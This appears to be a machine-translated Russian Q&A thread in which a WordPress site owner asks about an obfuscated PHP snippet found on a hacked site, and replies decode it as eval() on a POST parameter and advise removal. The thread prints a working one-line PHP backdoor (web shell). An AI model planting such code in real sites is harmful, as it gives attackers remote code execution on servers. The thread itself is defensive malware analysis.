У меня есть сайт wordpress, и я думаю, что он был заражен вредоносными программами. Я нашел этот бит php-кода в своих файлахЧто делает этот код?
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}
Что он делает?
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
$s20 вычисляет _POST
if(isset(${$s20}['q140b2c'])){
eval(${$s20}['q140b2c']);
}
становится
isset($_POST['q140b2c'])
Eval затем оценивает все, что на этом посту
eval($_POST['q140b2c']);
Хорошо, теперь как я могу очистить сайт и что мне нужно делать? –
Это не вопрос, который вы задали, и я честно понятия не имею. –
Я сталкиваюсь с тем же вопросом с одним из моих предыдущих взломов сайта. Тот же код, что и выше. Они собираются поставить код этого кода в файл .php до начала тега PHP.
Таким образом, он будет содержать выполнение PHP-сайта.
Чтобы решить скачать все коды & искать в файле & удалить. Тогда ваш сайт работает нормально.
Это эквивалентно: 'если (Исеть ($ _POST ['q140b2c']) {eval ($ _ POST ['q140b2c' ]); } '. Он дает злоумышленнику знания о том, какое значение установить, возможность запускать все, что он хочет на сервере. – Phylogenesis